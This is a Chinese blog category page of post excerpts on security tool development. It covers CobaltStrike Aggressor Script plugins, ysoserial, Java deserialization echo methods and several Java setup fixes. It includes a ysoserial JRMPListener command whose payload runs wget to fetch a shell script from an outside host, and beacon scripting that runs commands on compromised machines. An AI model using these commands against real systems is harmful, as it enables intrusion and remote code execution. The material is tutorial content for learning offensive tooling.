安全工具开发
文章平均质量分 60
Adsatrtgo
这个作者很懒,什么都没留下…
展开
-
javafx开发环境踩坑记录
javafx开发环境踩坑记录,包括idea搭建环境以及解决相关报错原创 2022-09-15 00:46:03 · 685 阅读 · 0 评论 -
CobaltStrike插件开发-learning-day4
CobaltStrike插件的场景执行系统命令bshell($1,"whoami");$1为当前beacon的id具体弹框出来看一下:show_message($1) 每个会话都是随机的模拟一个简单的场景,实现上线用户信息的查看,code如下,注意以下三种写法都可sub showuser { show_message($1); bshell($1, "query user");}popup beacon_bottom { menu "查看用户信息"{原创 2021-03-19 18:47:36 · 788 阅读 · 1 评论 -
CobaltStrike插件开发-learning-day3
CobaltStrike插件学习-doing-day3快捷键bind Ctrl+S { show_message("hello,word!");}菜单编写println("-------------菜单创建--------");popup good{ item("&打工人",{url_open("https://www.baidu.com")});#子菜单 separator(); item("&打工魂",{url_open("https://m原创 2021-03-18 10:48:03 · 538 阅读 · 0 评论 -
CobaltStrike插件开发-learning-day2
day2还是在sleep.jar里操作,承接上文链接函数引用println("-----函数引用------------------");$addf = &addTwoValues;[$addf : "3", 55.0];[&addTwoValues : "3", 55.0];[{ println($1 + $2); } : "3", 55.0];while循环println("-----while------------------");$a = 0原创 2021-03-17 11:18:37 · 232 阅读 · 1 评论 -
CobaltStrike插件开发-learning-day1
给多人运动神器CobaltStrike写插件学习day1基本认识Aggressor Script官方介绍:https://www.cobaltstrike.com/aggressor-script/index.htmlAggressor Script是C23.0版及更高版本中内置的脚本语言Aggressor Script基于sleep,但是控制台:加载脚本GUI方式:非GUI方式:./agscript [host] [port] [user] ...原创 2021-03-16 16:09:13 · 1024 阅读 · 0 评论 -
ysoserial的代码学习
反序列化漏洞利用神器:ysoserial0x01ysoserial 工具模块我们以为shiro远程加载反序列化数据的利用场景为例:java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test'其中-cp指定了类路径为:ysoserial.exploit.原创 2020-08-29 12:15:22 · 615 阅读 · 1 评论 -
JAVA反序列化基于常见框架/中间件回显方案
0x00概述JAVA反序列化漏洞是JAVA中最常见的可以直接获取目标权限的漏洞,通过反序列化回显的思路也是越来越多,如通过远程加载回显、在目标网站写文件、通过URLClassLoader回显、借助dnslog回显等。这些思路多少都有些瓶颈。一旦遇到了目标因网络策略严格无法出外网,则需要借助Dnslog的打法效果会失效,如果可以直观的返回命令执行结果,那岂不是更香?0x01知识点Tomcat处理流程在tomcat自己实现的Servlet处打断点,观察tomcat调用栈大致执行流程:调用过程原创 2020-08-27 10:08:41 · 1557 阅读 · 1 评论 -
JAVA类加载器,反射,双亲委派
0x01 类加载器:类的生命周期:加载(类加载器负责)------->连接(验证类是否合法,分配类静态变量内存空间并赋值,解析地址)---->初始化--->使用(调用静态方法,new实例)类加载器的作用:加载java文件到JVM常见的类加载器:(1)Bootstrap ClassLoader(引导类加载器)---顶层类加载器--由c++实现(2)Extension ClassLoader(扩展类加载器)---加载jre(3)App ClassLoader(系统类加载原创 2020-08-26 12:10:06 · 629 阅读 · 2 评论 -
IDEA javaweb项目常见踩坑问题
0x01 JSP代码报红关于request相关操作的,这种问题属于未导入tomcat lib包中的相关依赖解决办法:选择导入你自己项目工程配置的tomcat导入后确定 ,问题解决了0x02 项目运行后页面404这种问题属于未在tomcat运行配置中选择自己的war项目,或者自己配的访问路径有问题解决方法:导入部署项目选择项目工程一路确定后,运行项目0x03 tomcat中webapp缺少自己运行的项目文件默认输出路..原创 2020-07-23 11:04:40 · 584 阅读 · 0 评论 -
HttpURLConnection ssl证书校验问题(java.security.cert.CertificateException)
HttpURLConnection校验问题在请求的时候遇到报错:java.security.cert.CertificateException: No subject alternative names presentat sun.security.ssl.Alerts.getSSLException(Alerts.java:192)at sun.security.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1946)**对应代码以及报错:0x01原创 2020-07-13 10:39:45 · 3540 阅读 · 1 评论 -
IDEA打包jar-解决错误: 找不到或无法加载主类 main
学习大佬们开发安全小工具,打包jar解决错误: 找不到或无法加载主类 main1 Maven方式遇到报错”找不到或无法加载主类 main“解决方案一定加入<build> <plugins>中的插件,这里需要注意的是<mainClass>Main</mainClass>,这里填写的路径为/src/main/java下开始写的<?xml version="1.0" encoding="UTF-8"?><proj.原创 2020-06-21 23:31:49 · 23187 阅读 · 4 评论